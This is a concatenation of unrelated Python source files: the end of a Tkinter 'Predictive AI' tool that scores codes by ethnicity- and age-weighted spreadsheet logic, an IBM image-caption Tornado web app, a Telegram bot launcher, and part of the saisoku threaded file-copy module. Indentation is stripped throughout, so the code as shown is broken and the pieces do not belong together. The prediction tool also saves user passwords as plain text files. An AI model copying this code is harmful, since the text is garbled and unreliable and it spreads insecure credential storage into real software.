for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
settlement_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['ethnicity_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Ethnicity Logic.xlsx')
#total = df.iloc[9,:]
cols = df.columns
for inx,rows in df.iterrows():
if rows['Ethnicity']!=rows['Ethnicity']:
break
else:
if ethnicity == rows['Ethnicity']:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=311229:
prob = rows[code_idx]
consumption_dict['Ethnicity Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
pass
else:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=311129:
prob = 1
consumption_dict['Ethnicity Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
pass
ethnicity_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
ethnicity_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['finetuning_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Fine tuning logic.xlsx')
#total = df.iloc[9,:]
cols = df.columns
for inx,rows in df.iterrows():
if rows['Age']!=rows['Age']:
break
else:
age_r = rows['Age'].split('-')
age_start = int(age_r[0])
age_end = int(age_r[1])
if age_start <= age <= age_end:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=31119:
if '#' not in str(rows[code_idx]):
prob = rows[code_idx]
consumption_dict['Finetuning Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
tat_val[inx] = -100000
else:
continue
finetuning_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
finetuning_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['layer_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Layer Logic.xlsx')
layer = 0
for idx,rows in df.iterrows():
layer = layer + 1
if layer == 1:
initial_prediction_weight = rows['Weightage']
elif layer ==2:
settlement_logic_weight = rows['Weightage']
elif layer == 3:
ethnicity_logic_weight = rows['Weightage']
elif layer == 4:
finetuning_logic_weight = rows['Weightage']
else:
pass
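                # Added note: blend the four logic layers using the sheet's
                # weightages. Each later layer contributes through its ratio to
                # the previous layer's score, all scaled by the initial score.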
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
tat_val[inx] = intial_logic[code_idx]*(initial_prediction_weight + settlement_logic_weight*(settlement_logic[code_idx]/intial_logic[code_idx]) + ethnicity_logic_weight*(ethnicity_logic[code_idx]/settlement_logic[code_idx]) + finetuning_logic_weight*(finetuning_logic[code_idx]/ethnicity_logic[code_idx]))
consumption_dict['Layer Logic'] = "Consumed"
final_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
final_logic[code_idx] = tat_val[inx]
def get_logic_pred(dicte):
new_dicte = {k: v for k, v in sorted(dicte.items(), key=lambda item: item[1], reverse=True)}
cnt = 0
logic_pred = []
for idx,value in new_dicte.items():
                    cnt += 1
logic_pred.append(idx)
return logic_pred
intial_logic_pred = get_logic_pred(intial_logic)
ethnicity_logic_pred = get_logic_pred(ethnicity_logic)
settlement_logic_pred = get_logic_pred(settlement_logic)
finetuning_logic_pred = get_logic_pred(finetuning_logic)
final_logic_pred = get_logic_pred(final_logic)
consumption_metric = [col_number,json.dumps(consumption_dict)]
prediction_metric = [col_number,json.dumps(intial_logic),intial_logic_pred,json.dumps(settlement_logic),settlement_logic_pred,json.dumps(ethnicity_logic),ethnicity_logic_pred,json.dumps(finetuning_logic),finetuning_logic_pred,json.dumps(final_logic),final_logic_pred]
predictions = list(final_logic_pred)[:5]
top_2_val = [int(final_logic[i]) for i in (predictions)]
top_2_idx = []
for val in predictions:
wer = val.split()
top_2_idx.append(int(wer[1]))
#print(tat_val)
#accuarcy = [val/sum(top_2_val) for val in top_2_val]
#predictions = ["Code " + str(idx+1) for idx in reversed(top_2_idx)]
score_relat,score_std = get_percentile(top_2_val,sum_std_mat,top_2_idx,to_check_array)
return predictions,score_relat,score_std,prediction_metric,consumption_metric,mat_master_dict,to_check_dict
def save_master_log(master_sheet_filepath):
df = pd.read_excel(master_sheet_filepath)
df_w = df.fillna(0)
df_w = df_w.iloc[3:,:]
weightage = list(df_w.iloc[:,4].values)
df = pd.read_excel(master_sheet_filepath)
df_s = df.fillna(0)
df_s = df_s.iloc[3:,:]
scores = df_s.iloc[:,5].values
scores = np.where(scores == 'B',-1,scores)
scores = np.where(scores == 'A',1,scores)
#scores = np.prod(scores)
#weightage.append(scores)
np.savetxt('AI Internal-Outputs/master_log_weightage.txt', weightage)
np.savetxt('AI Internal-Outputs/master_log_score.txt',scores)
def get_recommendation(df_attempt):
b = np.loadtxt('AI Internal-Outputs/master_log_weightage.txt')
c = np.loadtxt('AI Internal-Outputs/master_log_score.txt')
scores = (np.multiply(c,df_attempt)).flatten()
sc_a = 0
sc_b = 0
for sc in scores:
if sc==-1:
sc_b+=1
elif sc == 1:
sc_a+=1
else :
pass
if sc_b == 0:
if sc_a ==0:
score = "No Score Defined"
else:
score = 'A'
else:
score = 'B'
self.weightage = b
mul = (np.multiply(self.weightage,df_attempt)).flatten()
#mul = [(i+5)/2 for i in mul if i != 0]
cum_score = np.sum(mul)
#print(cum_score)
#print(cum_score)
if cum_score < 0 :
cum_score = 0
elif cum_score > 5:
cum_score = 5
elif 0<=cum_score<=1:
cum_score = 0
elif 1<cum_score<=2:
cum_score = 1
elif 2<cum_score<=3:
cum_score = 2
elif 3<cum_score<=4:
cum_score = 3
elif 4<cum_score<5:
cum_score = 4
else:
cum_score = 5
filepath = curdir + "/Input Sheets/recommendation_sheet.csv"
df = pd.read_csv(filepath)
#df_k = df.fillna(" ")
x = df.iloc[1:,1:].values
x = x.flatten()
self.recom_tot_val = []
for value in x:
if value!=value:
pass
else:
#print(value)
self.recom_tot_val.append(value)
score_a = df.iloc[6,:]
score_b = df.iloc[7,:]
for idx,row in df.iterrows():
if idx == int(cum_score):
recom = [row['Intepretation-1']]
if score=="No Score Defined":
recom.append(row['Intepretation-2'])
recom.append(row['Intepretation-3'])
else :
if score=='A':
recom.append(score_a['Intepretation-2'])
recom.append(score_a['Intepretation-3'])
else:
recom.append(score_b['Intepretation-2'])
recom.append(score_b['Intepretation-3'])
return recom,cum_score,score,mul
def execute(df,col_number,mat_master_dict,to_check_dict):
sf = read_master_sheet(self.master_sheet_filepath)
save_master_log(self.master_sheet_filepath)
standard_matrix,qualifying_dict,sum_std_mat,lent = get_standard_matrix(sf)
to_check_array,age,ethnicity = get_test_output(df,col_number)
predictions,score_relat,score_std,prediction_metric,consumption_metric,mat_master_dict,to_check_dict = get_top_5_predictions(to_check_array,age,standard_matrix,qualifying_dict,sum_std_mat,ethnicity,col_number,lent,mat_master_dict,to_check_dict)
#print("Age of the user is = ",age)
#print("TOP 5 PREDICTIONS ARE :")
#print(predictions)
#print("With Cumilitave scores of :")
#print(scores)
return age,predictions,score_relat,score_std,ethnicity,prediction_metric,consumption_metric,mat_master_dict,lent,to_check_dict
def execute_single_files():
print("____________*** Prediction Al ***_____________________")
print("Please make sure master sheet and test sheet are uploaded")
print(" ")
for test_sheet_filepath in self.test_sheet_filepaths:
self.test_sheet_filepath = test_sheet_filepath
file1 = open("AI External-Outputs/path_info.txt", "w")
file1.write("M"+self.master_sheet_filepath)
file1.write(" \n")
file1.write("T"+self.test_sheet_filepath)
file1.write(" \n")
file1.close()
test_df = read_data(self.test_sheet_filepath)
col_name = test_df.iloc[:4:].columns
col_name = col_name
test_df = read_data(self.test_sheet_filepath)
test_df = df_column_uniquify(test_df)
temp_df = test_df.iloc[:,4:]
col_name = temp_df.columns
code_values = temp_df.iloc[0].values
prediction_output = []
accuracy_1 = 0
accuracy_2 = 0
self.cnt = 0
# Progress bar widget
prediction_metrics = []
consumption_metrics = []
mat_master_dict = {}
to_check_dict = {}
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
                cols_names = ['Column Reference Code','Actual Code','Age','Ethnicity','Prediction Codes','Relative Confidence Percentage','Standard Confidence Percentage','Story','Recommendations','5 yr Risk','10 yr Risk','Lifetime Risk']
df = pd.DataFrame(columns =cols_names)
df.to_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename),index=False)
for idx,col in enumerate(col_name):
age,prediction,score_relat,score_std,ethnicity,prediction_metric,consumption_metric,mat_master_dict,lent,to_check_dict = execute(test_df,col,mat_master_dict,to_check_dict)
consumption_metrics.append(consumption_metric)
prediction_metrics.append(prediction_metric)
prediction_output = [col,code_values[idx], age,ethnicity, prediction,score_relat,score_std,'story','Recommendations','5 yr risk','10 yr risk','lifetime risk']
if code_values[idx]!=code_values[idx]:
code_values[idx] = "Not Provided"
if col!=col:
col = "Not Provided"
if age!=age:
age = "Not Provided"
if ethnicity!=ethnicity:
ethnicity = "Not Provided"
print("-----------------------------------------CASE NUMBER = {}------------------------------------------------------".format(col))
print()
                    print('Case Number {} (Age {} yrs, Ethnicity {}) has an Actual Provided Code of {}; however, the AI Top 5 Prediction Codes are {} with Relative Confidence Percentages of {}'.format(col,age,ethnicity,code_values[idx],prediction,score_relat))
print()
print("******************************************************************************************************************************************************************************************************************************************")
self.cnt = self.cnt+1
if code_values[idx] in [prediction[0],prediction[1]]:
accuracy_2 = accuracy_2+1
if code_values[idx] == prediction[0]:
accuracy_1 = accuracy_1+1
                df = pd.DataFrame(consumption_metrics, columns =['Column Reference Code','Logic Consumption Dictionary'])
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
with open("Input Sheets/mat_dict.txt",'r') as file:
line = file.read()
inner_list = [elt.strip() for elt in line.split(',')]
inner_list = inner_list[:-1]
with open("AI External-Outputs/matmul_{}.csv".format(t_filename),'w') as f:
w = csv.writer(f)
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
w.writerow(code_dict)
for key,val in mat_master_dict.items():
w.writerow([key])
w.writerows(val)
with open("AI External-Outputs/attempt_sheet_{}.csv".format(t_filename),'w') as f:
w = csv.writer(f)
for key,val in to_check_dict.items():
w.writerow([key])
w.writerows([val])
df.to_csv("AI External-Outputs/Consumption_metric_{}.csv".format(t_filename))
                df = pd.DataFrame(prediction_metrics, columns =['Column Reference Code','Initial Score','Initial Prediction','Settlement Logic','Settlement Prediction','Ethnicity Logic','Ethnicity Prediction','Fine Tuning Logic','Fine Tuning Prediction','Final Logic','Final Prediction'])
df.to_csv("AI External-Outputs/Prediction_metric_{}.csv".format(t_filename))
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
total_df= pd.read_excel(test_filepath)
chl = 0
chlt = 0
for inxt,rows in total_df.iterrows():
if rows['Sub-Feature'] == "external factor":
chl = inxt
for inxt,rows in total_df.iterrows():
if rows['Sub-Feature'] == "endFeatures":
chlt = inxt
df_ops = total_df[[col]]
df_ops = df_ops.fillna(0)
df_process = total_df.fillna(method='ffill')
df_attempt = df_ops.where(df_ops == 0, 1)
df_attempt = (df_attempt.iloc[chl:chlt-1,:]).values
df_attempt = df_attempt.flatten()
recommendation,cum_score,score,mul = get_recommendation(df_attempt)
df = pd.read_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename))
dicte= {}
for inx,items in enumerate(prediction_output):
dicte[cols_names[inx]] = items
dicte['Recommendations'] = recommendation
df = df.append(dicte,ignore_index=True)
df.to_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename),index=False)
#print("Accurate is ",accuracy)
if self.cnt==0:
self.cnt= 1
self.accuracy_2 = (accuracy_2/self.cnt)*100
self.accuracy_1 = (accuracy_1/self.cnt)*100
gr = GeneticRisk()
sk = storykey()
                a = threading.Thread(target=gr.execute, args=(self.test_sheet_filepath, col))
a.start()
a.join()
sk.execute(self.test_sheet_filepath,col,idx)
execute_single_files()
def exit_the_window():
self.user_root.destroy()
def display(self):
def add_user_verify():
if not os.path.exists('user_pass_database'):
os.makedirs('user_pass_database')
username_info = username_data_entry.get()
password_info = password_data_entry.get()
start_code_info = start_code_entry.get()
end_code_info = end_code_entry.get()
file = open("user_pass_database/" + username_info + ".txt", "w")
file.write(username_info + "\n")
file.write(password_info + "\n")
file.write(start_code_info + "\n")
file.write(end_code_info + "\n")
file.close()
username_data_entry.delete(0, END)
password_data_entry.delete(0, END)
start_code_entry.delete(0, END)
end_code_entry.delete(0, END)
Label(self.user_root, text="Added Successfully", fg="green", font=("calibri", 11)).pack()
Button(self.user_root, text="Exit", width=10, height=1, command = self.user_root.destroy()).pack()
def add_user_data():
global username_data
global password_data
global start_code
global end_code
global username_data_entry
global password_data_entry
global start_code_entry
global end_code_entry
username_data = StringVar()
password_data = StringVar()
start_code = StringVar()
end_code = StringVar()
self.user_root = tkinter.Tk()
self.user_root.geometry("500x500")
Label(self.user_root, text="Username * ").pack()
username_data_entry = Entry(self.user_root, textvariable=username_data)
username_data_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="Password * ").pack()
password_data_entry = Entry(self.user_root, textvariable=password_data)
password_data_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="Start Unique Code").pack()
start_code_entry = Entry(self.user_root, textvariable=start_code)
start_code_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="End Unique Code").pack()
end_code_entry = Entry(self.user_root, textvariable=end_code)
end_code_entry.pack()
Label(self.user_root, text="").pack()
Button(self.user_root, text="Add user data", width=10, height=1, command = add_user_verify).pack()
def display_prediction():
root = tkinter.Tk()
root.geometry("1024x1024")
ico_path = curdir+"\media\my_icon.ico"
root.iconbitmap(ico_path)
grid = MagicGrid(root)
grid.pack(side="top", expand=2, fill="both")
# open file
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
with open(self.current_dir+"/AI External-Outputs/Prediction_output_{}.csv".format(t_filename), newline = "") as file:
reader = csv.reader(file)
parsed_rows = 0
# r and c tell us where to grid the labels
for row in reader:
if parsed_rows == 0:
# Display the first row as a header
grid.add_header(*row)
else:
grid.add_row(*row)
parsed_rows += 1
root.mainloop()
root = Tk()
ico_path = curdir+"\media\my_icon.ico"
root.iconbitmap(ico_path)
# specify size of window.
root.geometry("1024x1024")
# Create text widget and specify size.
T = Text(root, height = 5, width = 52)
# Create label
l = Label(root, text = "Prediction by AI are saved")
l.config(font =("Courier", 14))
# Create button for next text.
b1 = Button(root, text = "Display the Predictions", command = display_prediction)
# Create an Exit button.
b2 = Button(root, text = "Exit",
command = root.destroy)
b3 = Button(root, text = "Add User Data", command = add_user_data)
T.insert(END, "Total Number of user Tested = ")
T.insert(END, str(self.cnt)+'\n')
T.insert(END, "Accuracy for being in top 2 predictions = ")
T.insert(END, str(self.accuracy_2)+'\n')
T.insert(END, "Accuracy for being the top predictions = ")
T.insert(END, str(self.accuracy_1)+'\n')
l.pack()
T.pack()
b1.pack()
b2.pack()
b3.pack()
# Insert The Fact.
def start_submit_thread(self,event):
global submit_thread
submit_thread = threading.Thread(target=self.get_prediction)
submit_thread.daemon = True
self.progressbar.start()
submit_thread.start()
self.root.after(100, self.check_submit_thread)
def check_submit_thread(self):
if submit_thread.is_alive():
self.progressbar["value"] = int(self.progressbar["value"] + 10)
Label(self.root,text=(str(self.progressbar["value"])+"/"+"100")).grid(row=1, column=0, columnspan=2, ipadx=50)
self.progressbar.update()
self.root.after(100, self.check_submit_thread)
else:
#print("yes")
self.progressbar.stop()
self.display()
# Designing popup for login invalid password
def password_not_recognised():
global password_not_recog_screen
password_not_recog_screen = Toplevel(login_screen)
ico_path = curdir+"\media\my_icon.ico"
password_not_recog_screen.iconbitmap(ico_path)
password_not_recog_screen.title("Success")
password_not_recog_screen.geometry("150x100")
Label(password_not_recog_screen, text="Invalid Password ").pack()
Button(password_not_recog_screen, text="OK", command=delete_password_not_recognised).pack()
# Designing popup for user not found
def user_not_found():
global user_not_found_screen
user_not_found_screen = Toplevel(login_screen)
    ico_path = os.path.join(curdir, "media", "my_icon.ico")
    user_not_found_screen.iconbitmap(ico_path)
    user_not_found_screen.title("Error")
user_not_found_screen.geometry("150x100")
Label(user_not_found_screen, text="User Not Found").pack()
Button(user_not_found_screen, text="OK", command=delete_user_not_found_screen).pack()
    user_not_found_screen.after(500, delete_user_not_found_screen)
# Deleting popups
def delete_login_success():
login_success_screen.destroy()
login_screen.destroy()
main_screen.destroy()
def delete_password_not_recognised():
password_not_recog_screen.destroy()
def delete_user_not_found_screen():
user_not_found_screen.destroy()
# Designing Main(first) window
def main_account_screen():
if not os.path.exists('user_credential_database'):
os.makedirs('user_credential_database')
global main_screen
main_screen = Tk()
    ico_path = os.path.join(curdir, "media", "my_icon.ico")
main_screen.iconbitmap(ico_path)
main_screen.geometry("300x250")
main_screen.title("Account Login")
Label(text="PREDECTIVE AI", bg="blue", width="300", height="2", font=("Calibri", 13)).pack()
Label(text="").pack()
Button(text="Login", height="2", width="30", command = login).pack()
Label(text="").pack()
Button(text="Register", height="2", width="30", command=register).pack()
main_screen.mainloop()
main_account_screen()
|
app.py
|
#!/usr/bin/env python
#
# Copyright 2018 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import collections
import json
import logging
import os
import requests
import signal
import time
import threading
from tornado import httpserver, ioloop, web
from tornado.options import define, options, parse_command_line
try:
import Queue as queue
except ImportError:
import queue
# Command Line Options
define("port", default=8088, help="Port the web app will run on")
define("ml-endpoint", default="http://localhost:5000",
help="The Image Caption Generator REST endpoint")
# Setup Logging
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"),
format='%(levelname)s: %(message)s')
# Global variables
static_img_path = "static/img/images/"
temp_img_prefix = "MAX-"
image_captions = collections.OrderedDict()
VALID_EXT = ['png', 'jpg', 'jpeg', 'gif']
class MainHandler(web.RequestHandler):
def get(self):
self.render("index.html", image_captions=image_captions)
class DetailHandler(web.RequestHandler):
def get(self):
image = self.get_argument('image', None)
if not image:
self.set_status(400)
return self.finish("400: Missing image parameter")
if image not in image_captions:
self.set_status(404)
return self.finish("404: Image not found")
self.render("detail-snippet.html", image=image,
predictions=image_captions[image])
class CleanupHandler(web.RequestHandler):
def get(self):
self.render("cleanup.html")
def delete(self):
clean_up()
class UploadHandler(web.RequestHandler):
def post(self):
finish_ret = []
threads = []
ret_queue = queue.Queue()
new_files = self.request.files['file']
for file_des in new_files:
file_name = temp_img_prefix + file_des['filename']
if valid_file_ext(file_name):
rel_path = static_img_path + file_name
output_file = open(rel_path, 'wb')
output_file.write(file_des['body'])
output_file.close()
t = threading.Thread(target=run_ml_queued,
args=(rel_path, ret_queue))
threads.append(t)
t.start()
for t in threads:
t.join()
sorted_ret = sorted(list(ret_queue.queue), key=lambda t: t[0].lower())
for rel_path, caption in sorted_ret:
finish_ret.append({
"file_name": rel_path,
"caption": caption[0]['caption']
})
if not finish_ret:
self.send_error(400)
return
sort_image_captions()
self.finish(json.dumps(finish_ret))
def run_ml_queued(img_path, ret_queue):
caption = run_ml(img_path)
ret_queue.put((img_path, caption))
def valid_file_ext(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in VALID_EXT
# Runs ML on given image
def run_ml(img_path):
img_file = {'image': open(img_path, 'rb')}
r = requests.post(url=ml_endpoint, files=img_file)
cap_json = r.json()
caption = cap_json['predictions']
image_captions[img_path] = caption
return caption
def sort_image_captions():
global image_captions
image_captions = collections.OrderedDict(
sorted(image_captions.items(), key=lambda t: t[0].lower()))
# Gets list of images with relative paths from static dir
def get_image_list():
image_list = sorted(os.listdir(static_img_path))
rel_img_list = [static_img_path + s for s in image_list]
return rel_img_list
# Run all static images through ML
def prepare_metadata():
threads = []
rel_img_list = get_image_list()
for img in rel_img_list:
t = threading.Thread(target=run_ml, args=(img,))
threads.append(t)
t.start()
for t in threads:
t.join()
sort_image_captions()
# Deletes all files uploaded through the GUI and removes them from the dict
def clean_up():
img_list = get_image_list()
for img_file in img_list:
if img_file.startswith(static_img_path + temp_img_prefix):
os.remove(img_file)
image_captions.pop(img_file)
def signal_handler(sig, frame):
ioloop.IOLoop.current().add_callback_from_signal(shutdown)
def shutdown():
logging.info("Cleaning up image files")
clean_up()
logging.info("Stopping web server")
server.stop()
ioloop.IOLoop.current().stop()
def make_app():
handlers = [
(r"/", MainHandler),
(r"/upload", UploadHandler),
(r"/cleanup", CleanupHandler),
(r"/detail", DetailHandler)
]
configs = {
'static_path': 'static',
'template_path': 'templates'
}
return web.Application(handlers, **configs)
def main():
parse_command_line()
global ml_endpoint
ml_endpoint = options.ml_endpoint
if '/model/predict' not in options.ml_endpoint:
ml_endpoint = options.ml_endpoint.rstrip('/') + "/model/predict"
logging.info("Connecting to ML endpoint at %s", ml_endpoint)
try:
requests.get(ml_endpoint)
except requests.exceptions.ConnectionError:
logging.error(
"Cannot connect to the Image Caption Generator REST endpoint at " +
options.ml_endpoint)
raise SystemExit
logging.info("Starting web server")
app = make_app()
global server
server = httpserver.HTTPServer(app)
server.listen(options.port)
signal.signal(signal.SIGINT, signal_handler)
logging.info("Preparing ML metadata (this may take some time)")
start = time.time()
prepare_metadata()
end = time.time()
logging.info("Metadata prepared in %s seconds", end - start)
logging.info("Use Ctrl+C to stop web server")
ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
|
main.py
|
from marks_monitoring import tg_bot
import threading
def main():
threading.Thread(target=lambda: tg_bot.bot.polling(none_stop=True)).start()
print("Telegram bot started successfully")
if __name__ == "__main__":
main()
|
saisoku.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""saisoku.py
Saisoku is a Python module that helps you build complex pipelines of batch file copying jobs.
See README.md or https://github.com/shirosaidev/saisoku
for more information.
Author: shirosai <cpark16@gmail.com>
Copyright (C) Chris Park 2019
saisoku is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import errno
import os
import time
import mmap
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
import shutil
from shutil import Error
import pyfastcopy
from scandir import scandir
from tqdm import tqdm
import logging
import tempfile
SAISOKU_VERSION = '0.1-b.4'
__version__ = SAISOKU_VERSION
# settings
logtofile = True
loglevel = logging.DEBUG
fileQueue = Queue()
def logging_setup():
"""Set up logging."""
logger = logging.getLogger(name='saisoku')
logger.setLevel(loglevel)
logformatter = logging.Formatter('%(asctime)s [%(levelname)s][%(name)s] %(message)s')
ch = logging.StreamHandler()
ch.setLevel(loglevel)
ch.setFormatter(logformatter)
logger.addHandler(ch)
logger.propagate = False
if logtofile:
logfile = os.path.join(tempfile.gettempdir(), 'saisoku.log')
hdlr = logging.FileHandler(logfile)
hdlr.setLevel(loglevel)
hdlr.setFormatter(logformatter)
logger.addHandler(hdlr)
return logger
logger = logging_setup()
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def output_banner():
import random
c = random.choice((color.PURPLE, color.CYAN, color.YELLOW, color.RED))
banner = '''%s
___ _ _
/ __| __ _ (_) ___ ___ | |__ _ _
\\__ \\ / _` | | | (_-< / _ \\ | / / | +| |
|___/ \\__,_| _|_|_ /__/_ \___/ |_\\_\\ \\_,_|
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' v%s
%s''' % (c, SAISOKU_VERSION, color.END)
print(banner)
def get_num_lines(fileNameList):
    """Get number of lines in txt file."""
    with open(fileNameList, "r+") as fp:
        buf = mmap.mmap(fp.fileno(), 0)
        lines = 0
        while buf.readline():
            lines += 1
        buf.close()
    return lines
class ThreadedCopy:
"""Threaded file copy class."""
totalFiles = 0
copyCount = 0
lock = Lock()
def __init__(self, src, dst, threads=16, filelist=None, symlinks=False, ignore=None, copymeta=True, package=False):
self.src = src
self.dst = dst
self.threads = threads
self.filelist = filelist
self.symlinks = symlinks
# copytree ignore patterns like '*.pyc', 'tmp*'
self.ignore = None if ignore is None else shutil.ignore_patterns(ignore)
self.copymeta = copymeta
self.is_package_task = package
self.fileList = []
self.sizecounter = 0
self.errors = []
logger.info('Starting file copy from %s to %s..' % (self.src, self.dst))
# open filelist txt file or scandir src path and preprocess the total files sizes
logger.info("Calculating total file size..")
if filelist:
with open(self.filelist, "r") as file: # txt with a file per line
for line in tqdm(file, total=get_num_lines(self.filelist), unit='files'):
fname = line.rstrip('\n')
if not self.is_package_task: # copy files package task
fpath = os.path.join(self.src, fname)
else:
fpath = fname
size = os.stat(fpath).st_size
self.fileList.append((fname, fpath, size))
self.sizecounter += size
else:
for item in tqdm(scandir(self.src), unit='files'): # scandir and build file list
self.fileList.append(item)
self.sizecounter += item.stat().st_size
# make dst directory if it doesn't exist and copy stat
try:
os.makedirs(dst)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
try:
shutil.copystat(src, dst)
except OSError as e:
            self.errors.append((self.src, self.dst, str(e)))
self.totalFiles = len(self.fileList)
logger.info("Copying " + str(self.totalFiles) + " files (" + str(self.sizecounter) + " bytes)..")
self.pbar = tqdm(total=self.sizecounter, unit='B', unit_scale=True, unit_divisor=1024)
self.threadWorkerCopy(self.fileList)
def CopyWorker(self):
"""Thread worker for file copying."""
while True:
fileName = fileQueue.get()
try:
isdir = fileName.is_dir() # scandir object
issym = fileName.is_symlink()
size = fileName.stat().st_size
fname = fileName.name
except AttributeError: # file from txt
fname, fpath, size = fileName
                isdir = os.path.isdir(fpath)
                issym = os.path.islink(fpath)
if not self.is_package_task:
srcname = os.path.join(self.src, fname)
else:
srcname = fname
dstname = os.path.join(self.dst, fname)
try:
if isdir:
#copyf = shutil.copy2 if self.copymeta else shutil.copyfile
#shutil.copytree(srcname, dstname, symlinks=self.symlinks,
# ignore=self.ignore, copy_function=copyf)
pass
else:
if issym is self.symlinks:
if self.copymeta:
try:
shutil.copy2(srcname, dstname)
except (OSError, IOError) as e:
                                self.errors.append((self.src, self.dst, str(e)))
else:
shutil.copyfile(srcname, dstname)
except (OSError, IOError) as e:
self.errors.append((srcname, dstname, str(e)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as e:
self.errors.extend(e.args[0])
if self.errors:
raise Error(self.errors)
with self.lock:
self.copyCount += 1
#percent = (self.copyCount * 100) / self.totalFiles
#print(str(percent) + " percent copied.")
self.pbar.set_postfix(file=fname[-10:], refresh=False)
self.pbar.update(size)
fileQueue.task_done()
def threadWorkerCopy(self, fileNameList):
for i in range(self.threads):
t = Thread(target=self.CopyWorker)
t.daemon = True
t.start()
for fileName in fileNameList:
fileQueue.put(fileName)
fileQueue.join()
self.pbar.close()
logger.info('Done')
class ThreadedHTTPCopy:
"""Threaded HTTP file copy class."""
totalFiles = 0
copyCount = 0
lock = Lock()
def __init__(self, src, dst, threads=1, ports=[5005], fetchmode='urlretrieve', chunksize=8192):
self.src = src
self.dst = dst
self.threads = threads
self.ports = ports
self.fileList = []
self.sizecounter = 0
self.fetchmode = fetchmode # requests, urlretrieve
self.chunksize = chunksize
self.errors = []
logger.info('Starting file copy from %s to %s..' % (self.src, self.dst))
# get file list from http server
logger.info("Getting file list from http server..")
for item in tqdm(self.GetFileLinks(), unit='files'): # get file links and build file list
self.fileList.append(item)
self.sizecounter += item[1]
# make dst directory if it doesn't exist
try:
os.makedirs(dst)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
self.totalFiles = len(self.fileList)
logger.info("Copying " + str(self.totalFiles) + " files (" + str(self.sizecounter) + " bytes)..")
self.pbar = tqdm(total=self.sizecounter, unit='B', unit_scale=True, unit_divisor=1024)
self.threadWorkerCopy(self.fileList)
def GetFileLinks(self):
"""Generator that yields tuple of file links and their size at url."""
from bs4 import BeautifulSoup
import requests
url = self.tserv_lb()
r = requests.get(url)
html = r.content
soup = BeautifulSoup(html, 'html.parser')
for link in soup.find_all('a'):
if not link.get('href').endswith('/'): # files only
yield (link.get('href'), int(link.get('title')))
def FetchFile(self, src, dst):
"""Use urllib urlretrieve to fetch file."""
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import requests
if self.fetchmode == 'urlretrieve':
try:
urlretrieve(src, dst)
except Exception as e:
self.errors.append((src, dst, str(e)))
elif self.fetchmode == 'requests' or self.fetchmode is None:
try:
response = requests.get(src, stream=True)
handle = open(dst, "wb")
for chunk in response.iter_content(chunk_size=self.chunksize):
if chunk:
handle.write(chunk)
handle.close()
except Exception as e:
self.errors.append((src, dst, str(e)))
def tserv_lb(self):
"""Load balance across tserve ports."""
import random
port = random.choice(self.ports)
url = self.src + ":" + str(port)
return url
def CopyWorker(self):
"""Thread worker for file copying."""
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
while True:
fileItem = fileQueue.get()
fileName, size = fileItem
